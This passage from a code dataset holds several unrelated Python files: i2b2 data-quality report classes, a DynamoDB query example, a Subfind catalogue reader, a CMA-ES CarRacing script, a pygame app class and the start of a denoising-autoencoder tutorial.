reporter.uhl_reports.i2b2.patient_summary_tests import (\r\n    PatientSummaryDuplicatesReport,\r\n    PatientSummaryMissingData,\r\n    PatientSummaryMissingParticipants,\r\n)\r\nfrom reporter.uhl_reports.i2b2.valid_enrolment_tests import (\r\n    ValidEnrolmentsStudyIdDuplicates,\r\n    ValidEnrolmentsContactMultipleRecruitments,\r\n    RecruitedWithoutFullConsent,\r\n    PatientSummaryMissingRecruited,\r\n)\r\nfrom reporter.emailing import (\r\n    RECIPIENT_PREECLAMPSIA_ADMIN as RECIPIENT_ADMIN,\r\n)\r\nfrom reporter.core import Schedule\r\n\r\n\r\nI2B2_DB = \"i2b2_app03_preeclampsia_Data\"\r\n\r\n\r\nclass PreeclampsiaPatientMappingDuplicatesReport(\r\n        PatientMappingDuplicatesReport):\r\n    def __init__(self):\r\n        super().__init__(I2B2_DB, schedule=Schedule.never)\r\n\r\n\r\nclass PreeclampsiaPatientMappingMultiplesIdsReport(\r\n        PatientMappingMultiplesIdsReport):\r\n    def __init__(self):\r\n        super().__init__(I2B2_DB, schedule=Schedule.never)\r\n\r\n\r\nclass PreeclampsiaPatientSummaryDuplicatesReport(\r\n        PatientSummaryDuplicatesReport):\r\n    def __init__(self):\r\n        super().__init__(I2B2_DB, schedule=Schedule.never)\r\n\r\n\r\nclass PreeclampsiaPatientSummaryMissingData(\r\n        PatientSummaryMissingData):\r\n    def __init__(self):\r\n        super().__init__(\r\n            I2B2_DB,\r\n            [\r\n                'CiviCrmId',\r\n                'CiviCrmCaseId',\r\n                'NhsNumber',\r\n                'UhlSystemNumber',\r\n                'StudyNumber',\r\n                'Gender',\r\n                'DateOfBirth',\r\n                'Ethnicity',\r\n            ],\r\n            schedule=Schedule.never,\r\n        )\r\n\r\n\r\nclass PreeclampsiaPatientSummaryMissingParticipants(\r\n        PatientSummaryMissingParticipants):\r\n    def __init__(self):\r\n        super().__init__(I2B2_DB, schedule=Schedule.never)\r\n\r\n\r\nclass PreeclampsiaValidEnrolmentsStudyIdDuplicates(\r\n        ValidEnrolmentsStudyIdDuplicates):\r\n    def __init__(self):\r\n        super().__init__(\r\n            I2B2_DB,\r\n            [RECIPIENT_ADMIN],\r\n            schedule=Schedule.never,\r\n        )\r\n\r\n\r\nclass PreeclampsiaValidEnrolmentsContactMultipleRecruitments(\r\n        ValidEnrolmentsContactMultipleRecruitments):\r\n    def __init__(self):\r\n        super().__init__(\r\n            I2B2_DB,\r\n            [RECIPIENT_ADMIN],\r\n            schedule=Schedule.never,\r\n        )\r\n\r\n\r\nclass PreeclampsiaRecruitedWithoutFullConsent(\r\n        RecruitedWithoutFullConsent):\r\n    def __init__(self):\r\n        super().__init__(\r\n            I2B2_DB,\r\n            [RECIPIENT_ADMIN],\r\n            schedule=Schedule.never,\r\n        )\r\n\r\n\r\nclass PreeclampsiaPatientSummaryMissingRecruited(\r\n        PatientSummaryMissingRecruited):\r\n    def __init__(self):\r\n        super().__init__(\r\n            I2B2_DB,\r\n            [RECIPIENT_ADMIN],\r\n            schedule=Schedule.never,\r\n        
)\r\n","sub_path":"reporter/uhl_reports/preeclampsia/data_quality/i2b2_dq.py","file_name":"i2b2_dq.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"469869154","text":"import boto3\nfrom boto3.dynamodb.conditions import Key, Attr\n\n# Get the service resource.\ndynamodb = boto3.resource('dynamodb', endpoint_url='http://localhost:8000')\n\n# Instantiate a table resource object without actually\n# creating a DynamoDB table. Note that the attributes of this table\n# are lazy-loaded: a request is not made nor are the attribute\n# values populated until the attributes\n# on the table resource are accessed or its load() method is called.\ntable = dynamodb.Table('users')\n\n# QUERY\nresponse = table.query(\n KeyConditionExpression=Key('username').eq('johndoe')\n)\nitems = response['Items']\nprint(items)\n\n# SCAN\nresponse = table.scan(\n FilterExpression=Attr('age').lt(27)\n)\nitems = response['Items']\nprint(items)\n\n# SCAN and CONDITIONS\n\nresponse = table.scan(\n FilterExpression=Attr('first_name').begins_with('J') & Attr('account_type').eq('super_user')\n)\nitems = response['Items']\nprint(items)\n\nresponse = table.scan(\n FilterExpression=Attr('address.state').eq('CA')\n)\nitems = response['Items']\nprint(items)","sub_path":"01_Kit_AWS_SDK/code/8_Querying_and_scanning.py","file_name":"8_Querying_and_scanning.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"450112194","text":"# code for reading Subfind's subhalo_tab files\r\n# usage e.g.:\r\n#\r\n# import readsubf\r\n# cat = readsubf.subfind_catalog(\"./m_10002_h_94_501_z3_csf/\",63,masstab=True)\r\n# print( cat.nsubs\r\n# print( \"largest halo x position = \",cat.sub_pos[0][0] \r\n\r\nimport numpy as np\r\nimport os\r\nimport sys\r\n \r\nclass subfind_catalog:\r\n def __init__(self, basedir, snapnum, group_veldisp = False, masstab = False, long_ids = False, swap = False): # all optional parameters are not needed for HDF5 catalogues\r\n self.swap = swap\r\n \r\n self.filebase = basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/subhalo_tab_\" + str(snapnum).zfill(3) + \".\"\r\n self.idbase = basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/subhalo_ids_\" + str(snapnum).zfill(3) + \".\"\r\n \r\n curfile = self.filebase + str(\"0\") \r\n if (not os.path.exists(curfile)):\r\n if os.path.exists(basedir + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".hdf5\"):\r\n self.is_hdf5 = True\r\n self.filebase = basedir + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".\"\r\n elif os.path.exists(basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".0.hdf5\"):\r\n self.is_hdf5 = True\r\n self.filebase = basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".\"\r\n else:\r\n print( \"file not found:\", curfile, basedir + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".hdf5\",basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".0.hdf5\")\r\n sys.exit()\r\n else:\r\n self.is_hdf5 = False\r\n\r\n print()\r\n print( \"reading subfind catalog for snapshot\",snapnum,\"of\",basedir)\r\n\r\n if (not self.is_hdf5): # standard file\r\n \r\n if long_ids: self.id_type = np.uint64\r\n else: self.id_type = np.uint32\r\n \r\n self.group_veldisp = group_veldisp\r\n self.masstab = masstab\r\n \r\n filenum = 0\r\n doneflag = 
False\r\n skip_gr = 0\r\n skip_sub = 0\r\n while not doneflag:\r\n curfile = self.filebase + str(filenum)\r\n \r\n if (not os.path.exists(curfile)):\r\n print( \"file not found:\", curfile)\r\n sys.exit()\r\n \r\n f = open(curfile,'rb')\r\n \r\n ngroups = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n totngroups = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n nids = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n totnids = np.fromfile(f, dtype=np.uint64, count=1)[0]\r\n ntask = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n nsubs = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n totnsubs = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n \r\n if swap:\r\n ngroups = ngroups.byteswap()\r\n totngroups = totngroups.byteswap()\r\n nids = nids.byteswap()\r\n totnids = totnids.byteswap()\r\n ntask = ntask.byteswap()\r\n nsubs = nsubs.byteswap()\r\n totnsubs = totnsubs.byteswap()\r\n \r\n if filenum == 0:\r\n self.ngroups = totngroups\r\n self.nids = totnids\r\n self.nfiles = ntask\r\n self.nsubs = totnsubs\r\n\r\n self.group_len = np.empty(totngroups, dtype=np.uint32)\r\n self.group_offset = np.empty(totngroups, dtype=np.uint32)\r\n self.group_mass = np.empty(totngroups, dtype=np.float64)\r\n self.group_pos = np.empty(totngroups, dtype=np.dtype((np.float64,3)))\r\n self.group_m_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n if group_veldisp:\r\n self.group_veldisp_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_veldisp_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_veldisp_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_contamination_count = np.empty(totngroups, dtype=np.uint32)\r\n self.group_contamination_mass = np.empty(totngroups, dtype=np.float64)\r\n self.group_nsubs = np.empty(totngroups, dtype=np.uint32)\r\n self.group_firstsub = np.empty(totngroups, dtype=np.uint32)\r\n \r\n self.sub_len = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_offset = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_parent = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_mass = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_pos = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_vel = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_cm = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_spin = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_veldisp = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_vmax = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_vmaxrad = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_halfmassrad = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_id_mostbound = np.empty(totnsubs, dtype=self.id_type)\r\n self.sub_grnr = np.empty(totnsubs, dtype=np.uint32)\r\n if masstab:\r\n self.sub_masstab = np.empty(totnsubs, dtype=np.dtype((np.float64,6)))\r\n \r\n if ngroups > 0:\r\n locs = slice(skip_gr, skip_gr + ngroups)\r\n self.group_len[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups)\r\n self.group_offset[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups)\r\n self.group_mass[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_pos[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=ngroups)\r\n 
self.group_m_mean200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_r_mean200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_m_crit200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_r_crit200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_m_tophat200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_r_tophat200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n if group_veldisp:\r\n self.group_veldisp_mean200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_veldisp_crit200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_veldisp_tophat200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_contamination_count[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups)\r\n self.group_contamination_mass[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_nsubs[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups)\r\n self.group_firstsub[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups) \r\n skip_gr += ngroups\r\n \r\n if nsubs > 0:\r\n locs = slice(skip_sub, skip_sub + nsubs)\r\n self.sub_len[locs] = np.fromfile(f, dtype=np.uint32, count=nsubs)\r\n self.sub_offset[locs] = np.fromfile(f, dtype=np.uint32, count=nsubs)\r\n self.sub_parent[locs] = np.fromfile(f, dtype=np.uint32, count=nsubs)\r\n self.sub_mass[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_pos[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=nsubs)\r\n self.sub_vel[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=nsubs)\r\n self.sub_cm[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=nsubs)\r\n self.sub_spin[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=nsubs)\r\n self.sub_veldisp[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_vmax[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_vmaxrad[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_halfmassrad[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_id_mostbound[locs] = np.fromfile(f, dtype=self.id_type, count=nsubs)\r\n self.sub_grnr[locs] = np.fromfile(f, dtype=np.uint32, count=nsubs)\r\n if masstab:\r\n self.sub_masstab[locs] = np.fromfile(f, dtype=np.dtype((np.float64,6)), count=nsubs)\r\n skip_sub += nsubs\r\n\r\n curpos = f.tell()\r\n f.seek(0,os.SEEK_END)\r\n if curpos != f.tell(): print( \"Warning: finished reading before EOF for file\",filenum)\r\n f.close() \r\n #print( 'finished with file number',filenum,\"of\",ntask\r\n filenum += 1\r\n if filenum == self.nfiles:\r\n doneflag = True\r\n \r\n if swap:\r\n self.group_len.byteswap(True)\r\n self.group_offset.byteswap(True)\r\n self.group_mass.byteswap(True)\r\n self.group_pos.byteswap(True)\r\n self.group_m_mean200.byteswap(True)\r\n self.group_r_mean200.byteswap(True)\r\n self.group_m_crit200.byteswap(True)\r\n self.group_r_crit200.byteswap(True)\r\n self.group_m_tophat200.byteswap(True)\r\n self.group_r_tophat200.byteswap(True)\r\n if group_veldisp:\r\n self.group_veldisp_mean200.byteswap(True)\r\n self.group_veldisp_crit200.byteswap(True)\r\n self.group_veldisp_tophat200.byteswap(True)\r\n self.group_contamination_count.byteswap(True)\r\n self.group_contamination_mass.byteswap(True)\r\n self.group_nsubs.byteswap(True)\r\n self.group_firstsub.byteswap(True)\r\n \r\n self.sub_len.byteswap(True)\r\n self.sub_offset.byteswap(True)\r\n self.sub_parent.byteswap(True)\r\n 
self.sub_mass.byteswap(True)\r\n self.sub_pos.byteswap(True)\r\n self.sub_vel.byteswap(True)\r\n self.sub_cm.byteswap(True)\r\n self.sub_spin.byteswap(True)\r\n self.sub_veldisp.byteswap(True)\r\n self.sub_vmax.byteswap(True)\r\n self.sub_vmaxrad.byteswap(True)\r\n self.sub_halfmassrad.byteswap(True)\r\n self.sub_id_mostbound.byteswap(True)\r\n self.sub_grnr.byteswap(True)\r\n if masstab:\r\n self.sub_masstab.byteswap(True)\r\n \r\n print()\r\n print( \"number of groups =\", self.ngroups)\r\n print( \"number of subgroups =\", self.nsubs)\r\n if self.nsubs > 0:\r\n print( \"largest group of length\",self.group_len[0],\"has\",self.group_nsubs[0],\"subhalos\")\r\n print()\r\n \r\n else: # HDF5 file\r\n \r\n import h5py\r\n \r\n self.masstab = True\r\n \r\n filenum = 0\r\n doneflag = False\r\n skip_gr = 0\r\n skip_sub = 0\r\n \r\n while not doneflag:\r\n curfile = self.filebase + str(filenum) + \".hdf5\"\r\n \r\n if filenum == 0:\r\n if not os.path.exists(curfile):\r\n curfile = self.filebase + \"hdf5\"\r\n\r\n f = h5py.File(curfile, \"r\")\r\n \r\n totngroups = f[\"Header\"].attrs[\"Ngroups_Total\"]\r\n totnsubs = f[\"Header\"].attrs[\"Nsubgroups_Total\"]\r\n ngroups = f[\"Header\"].attrs[\"Ngroups_ThisFile\"]\r\n nsubs = f[\"Header\"].attrs[\"Nsubgroups_ThisFile\"]\r\n \r\n if filenum == 0:\r\n self.ngroups = f[\"Header\"].attrs[\"Ngroups_Total\"]\r\n self.nids = f[\"Header\"].attrs[\"Nids_Total\"]\r\n self.nfiles = f[\"Header\"].attrs[\"NumFiles\"]\r\n self.nsubs = f[\"Header\"].attrs[\"Nsubgroups_Total\"]\r\n\r\n self.id_type = f[\"Subhalo/SubhaloIDMostbound\"].value.dtype\r\n\r\n self.group_len = np.empty(totngroups, dtype=np.uint32)\r\n self.group_lentab = np.empty(totngroups, dtype=((np.uint32,6)))\r\n self.group_mass = np.empty(totngroups, dtype=np.float64)\r\n self.group_masstab = np.empty(totngroups, dtype=((np.float64,6)))\r\n self.group_pos = np.empty(totngroups, dtype=np.dtype((np.float64,3)))\r\n self.group_vel = np.empty(totngroups, dtype=np.dtype((np.float64,3)))\r\n self.group_m_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_crit500 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_crit500 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_nsubs = np.empty(totngroups, dtype=np.uint32)\r\n self.group_firstsub = np.empty(totngroups, dtype=np.uint32)\r\n #self.group_sfr = np.empty(totngroups, dtype=np.float64)\r\n \r\n self.sub_len = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_lentab = np.empty(totnsubs, dtype=((np.uint32,6)))\r\n self.sub_parent = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_mass = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_masstab = np.empty(totnsubs, dtype=((np.float64,6)))\r\n self.sub_pos = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_vel = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_cm = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_spin = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_veldisp = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_vmax = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_vmaxrad = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_halfmassrad = np.empty(totnsubs, 
dtype=np.float64)\r\n self.sub_id_mostbound = np.empty(totnsubs, dtype=self.id_type)\r\n self.sub_grnr = np.empty(totnsubs, dtype=np.uint32)\r\n \r\n if ngroups > 0:\r\n locs = slice(skip_gr, skip_gr + ngroups)\r\n self.group_len[locs] = f[\"Group/GroupLen\"].value\r\n self.group_lentab[locs] = f[\"Group/GroupLenType\"].value\r\n self.group_mass[locs] = f[\"Group/GroupMass\"].value\r\n self.group_masstab[locs] = f[\"Group/GroupMassType\"].value\r\n self.group_pos[locs] = f[\"Group/GroupPos\"].value\r\n self.group_vel[locs] = f[\"Group/GroupVel\"].value\r\n self.group_m_mean200[locs] = f[\"Group/Group_M_Mean200\"].value\r\n self.group_r_mean200[locs] = f[\"Group/Group_R_Mean200\"].value\r\n self.group_m_crit200[locs] = f[\"Group/Group_M_Crit200\"].value\r\n self.group_r_crit200[locs] = f[\"Group/Group_R_Crit200\"].value\r\n self.group_m_crit500[locs] = f[\"Group/Group_M_Crit500\"].value\r\n self.group_r_crit500[locs] = f[\"Group/Group_R_Crit500\"].value\r\n self.group_m_tophat200[locs] = f[\"Group/Group_M_TopHat200\"].value\r\n self.group_r_tophat200[locs] = f[\"Group/Group_R_TopHat200\"].value\r\n self.group_nsubs[locs] = f[\"Group/GroupNsubs\"].value\r\n self.group_firstsub[locs] = f[\"Group/GroupFirstSub\"].value\r\n #self.group_sfr = f[\"Group/GroupSFR\"].value\r\n skip_gr += ngroups\r\n \r\n if nsubs > 0:\r\n locs = slice(skip_sub, skip_sub + nsubs)\r\n self.sub_len[locs] = f[\"Subhalo/SubhaloLen\"].value\r\n self.sub_lentab[locs] = f[\"Subhalo/SubhaloLenType\"].value\r\n self.sub_parent[locs] = f[\"Subhalo/SubhaloParent\"].value\r\n self.sub_mass[locs] = f[\"Subhalo/SubhaloMass\"].value\r\n self.sub_masstab[locs] = f[\"Subhalo/SubhaloMassType\"].value\r\n self.sub_pos[locs] = f[\"Subhalo/SubhaloPos\"].value\r\n self.sub_vel[locs] = f[\"Subhalo/SubhaloVel\"].value\r\n self.sub_cm[locs] = f[\"Subhalo/SubhaloCM\"].value\r\n self.sub_spin[locs] = f[\"Subhalo/SubhaloSpin\"].value\r\n self.sub_veldisp[locs] = f[\"Subhalo/SubhaloVelDisp\"].value\r\n self.sub_vmax[locs] = f[\"Subhalo/SubhaloVmax\"].value\r\n self.sub_vmaxrad[locs] = f[\"Subhalo/SubhaloVmaxRad\"].value\r\n self.sub_halfmassrad[locs] = f[\"Subhalo/SubhaloHalfmassRad\"].value\r\n self.sub_id_mostbound[locs] = f[\"Subhalo/SubhaloIDMostbound\"].value\r\n self.sub_grnr[locs] = f[\"Subhalo/SubhaloGrNr\"].value\r\n skip_sub += nsubs\r\n \r\n f.close() \r\n filenum += 1\r\n if filenum == self.nfiles: \r\n doneflag = True\r\n \r\n self.group_offsettab = np.append(np.array([[0,0,0,0,0,0]],dtype=np.uint32),self.group_lentab.cumsum(axis=0)[0:-1],axis=0) \r\n self.sub_offsettab = np.append(np.array([[0,0,0,0,0,0]],dtype=np.uint32),self.sub_lentab.cumsum(axis=0)[0:-1],axis=0) \r\n for curgr in np.arange(self.ngroups):\r\n if self.group_nsubs[curgr] >= 1:\r\n cur_add_offsettab = self.group_offsettab[curgr] - self.sub_offsettab[self.group_firstsub[curgr]] \r\n self.sub_offsettab[self.group_firstsub[curgr]:self.group_firstsub[curgr]+self.group_nsubs[curgr]] += cur_add_offsettab\r\n \r\n print()\r\n print( \"number of groups =\", self.ngroups)\r\n print( \"number of subgroups =\", self.nsubs)\r\n if self.nsubs > 0:\r\n print( \"largest group of length\",self.group_len[0],\"has\",self.group_nsubs[0],\"subhalos\")\r\n print()\r\n \r\n def read_ids(self):\r\n self.ids = np.empty(self.nids,dtype=self.id_type)\r\n \r\n if self.nids>0: \r\n filenum = 0\r\n doneflag = False\r\n skip_ids = 0\r\n while not doneflag:\r\n curfile = self.idbase + str(filenum)\r\n \r\n if (not os.path.exists(curfile)):\r\n print( \"file not found:\", curfile)\r\n 
sys.exit()\r\n\r\n                f = open(curfile,'rb')\r\n\r\n                idngroups = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n                idtotngroups = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n                idnids = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n                idtotnids = np.fromfile(f, dtype=np.uint64, count=1)[0]\r\n                idntask = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n                idoffset = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n\r\n                if self.swap:\r\n                    idngroups = idngroups.byteswap()\r\n                    idtotngroups = idtotngroups.byteswap()\r\n                    idnids = idnids.byteswap()\r\n                    idtotnids = idtotnids.byteswap()\r\n                    idntask = idntask.byteswap()\r\n                    idoffset = idoffset.byteswap()\r\n\r\n                assert skip_ids == idoffset\r\n\r\n                self.ids[skip_ids:skip_ids+idnids] = np.fromfile(f, dtype=self.id_type, count=idnids)\r\n                skip_ids += idnids\r\n\r\n                filenum += 1\r\n                if filenum == self.nfiles: doneflag = True\r\n            assert skip_ids == self.nids\r\n            if self.swap:\r\n                self.ids.byteswap(True)\r\n        else:\r\n            print( \"there are no IDs in this SUBFIND output!\")\r\n","sub_path":"data/readsubf.py","file_name":"readsubf.py","file_ext":"py","file_size_in_byte":18892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83047950","text":"import time\nimport gym\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport numpy as np\nimport scipy.sparse as sc\nfrom scipy.stats import multivariate_normal\nimport cma\nimport utils.network\nimport utils.game\nimport sys\nimport os\n\n#dtype = torch.long\ndtype = torch.cuda.FloatTensor\ntorch.device('cuda')\n\n\ndef typedevice(tensor,typ,devi):\n    return tensor.to(device=devi,dtype=typ)\n\n\ndef progtot():\n    global dtype\n    global es\n    mu=np.zeros(3*1025)\n    es = cma.CMAEvolutionStrategy(mu, 0.2)\n    #es.optimize(utils.game.launch_scenarios)\n    #res = es.result\n    while not es.stop():\n        print('hey')\n        solutions = es.ask()\n        es.tell(solutions, [utils.game.launch_scenarios(s) for s in solutions])\n        es.disp()\n    return(es.result_pretty())\n\nif __name__ == \"__main__\":\n    dtype = torch.long\n    #dtype = torch.cuda.FloatTensor\n    device = 'cpu'\n    #device= 'cuda'\n    env = gym.make('CarRacing-v0')\n    try:\n        W=np.load('W.npy',allow_pickle=True)\n        print('loaded W')\n    except FileNotFoundError:\n        print('not found creating W')\n        # Nr, D and rho are never defined in this script; the values below are\n        # assumed placeholders (reservoir size, mean degree, spectral radius)\n        Nr, D, rho = 1000, 10, 0.9\n        W=sc.random(Nr,Nr,density=float(D/Nr))\n        W=rho/max(abs(np.linalg.eigvals(W.A)))*W\n        W=(2*W-(W!=0))\n        W=W.A\n        np.save('W.npy',W)\n    utils.network.dtype=dtype\n    utils.game.dtype=dtype\n    utils.network.W=W\n    utils.game.env=env\n    utils.network.device=device\n    utils.game.device=device\n    try:\n        net = torch.load('model.pt')\n        net.eval()\n        print('loaded net')\n    except FileNotFoundError:\n        print('creating net')\n        net=utils.network.initnet(0.9,dtype)\n        torch.save(net, 'model.pt')\n    utils.game.net=net\n    progtot()\n    env.close()\n\n\n","sub_path":"Clean/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395410188","text":"import pygame\nfrom Vector import Vector\nfrom Colours import colour\n\nclass App:\n    \"\"\"\n    Initialisation methods\n    __init__ = initialisation of class\n    __default__ = inputting default arguments\n    initPygame = initialise the pygame instance\n    \"\"\"\n    def __init__(self, *args, **kwargs):\n        self.__default__(**kwargs)\n        self.initPygame()\n        self.isOpen = True\n\n    def __default__(self, **kwargs):\n        self.defaultParams = {\n            \"fps\": 144,\n            \"tickrate\": 50,\n            \"resolution\": Vector(1200, 900),\n        }\n        # set params\n        
self.defaultParams.update(kwargs)\n        for param, value in self.defaultParams.items():\n            setattr(self, param, value)\n        # dt for game objects\n        self.dt = self.tickrate/float(self.fps)\n\n    def initPygame(self):\n        pygame.init()\n        self.clock = pygame.time.Clock()\n        self.display = pygame.display.set_mode(self.resolution, 0, 32)\n        self.display.fill(colour[\"white\"])\n        self.events = []\n        self.objects = {}\n\n    \"\"\"\n    addObjects = add game objects\n    Must be a class with the following methods:\n        render(self, display),\n        update(self, dt),\n    \"\"\"\n    def addObjects(self, **objectList):\n        for name, gameObject in objectList.items():\n            if name in self.objects:\n                raise NameError(\"Duplicate of object {0} at {1}\".format(name, gameObject))\n            self.objects[name] = gameObject\n\n    \"\"\"\n    run = go through one game loop\n    update = update all physics\n    render = render everything\n    getKeyPress = handle input\n    \"\"\"\n    def run(self):\n        try:\n            # process events\n            if self.isOpen:\n                pygame.event.pump()\n                self.events = pygame.event.get()\n            # game loop\n            for function in (self.getKeyPress, self.update, self.render):\n                if self.isOpen:\n                    function()\n        # keyboard cancel\n        except KeyboardInterrupt:\n            self.isOpen = False\n        # return game state\n        return self.isOpen\n\n    def update(self):\n        self.clock.tick(self.fps)\n        for name, gameObject in self.objects.items():\n            gameObject.update(self.dt)\n\n    def render(self):\n        self.display.fill(colour[\"rainbow\"])\n        colour[\"rainbow\"].cycle(self.dt)\n        for name, gameObject in self.objects.items():\n            gameObject.render(self.display)\n        pygame.display.update()\n\n    def getKeyPress(self):\n        for event in self.events:\n            if event.type == pygame.QUIT:\n                self.close()\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_ESCAPE:\n                    self.close()\n\n    def close(self):\n        pygame.quit()\n        self.isOpen = False\n    ","sub_path":"Projects/STG Ideas/Rainbow Test/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"95858093","text":"\"\"\"\n This tutorial introduces stacked denoising auto-encoders (SdA) using Theano.\n\n Denoising autoencoders are the building blocks for SdA.\n They are based on auto-encoders as the ones used in Bengio et al. 2007.\n An autoencoder takes an input x and first maps it to a hidden representation\n y = f_{\\theta}(x) = s(Wx+b), parameterized by \\theta={W,b}. The resulting\n latent representation y is then mapped back to a \"reconstructed\" vector\n z \\in [0,1]^d in input space z = g_{\\theta'}(y) = s(W'y + b'). The weight\n matrix W' can optionally be constrained such that W' = W^T, in which case\n the autoencoder is said to have tied weights. The network is trained such\n that it minimizes the reconstruction error (the error between x and z).\n\n For the denoising autoencoder, during training, first x is corrupted into\n \\tilde{x}, where \\tilde{x} is a partially destroyed version of x by means\n of a stochastic mapping. Afterwards y is computed as before (using\n \\tilde{x}), y = s(W\\tilde{x} + b) and z as s(W'y + b'). The reconstruction\n error is now measured between z and the uncorrupted input x, which is\n computed as the cross-entropy :\n      - \\sum_{k=1}^d[ x_k \\log z_k + (1-x_k) \\log( 1-z_k)]\n\n\n References :\n   - P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and\n   Composing Robust Features with Denoising Autoencoders, ICML'08, 1096-1103,\n   2008\n   - Y. Bengio, P. Lamblin, D. Popovici, H. 
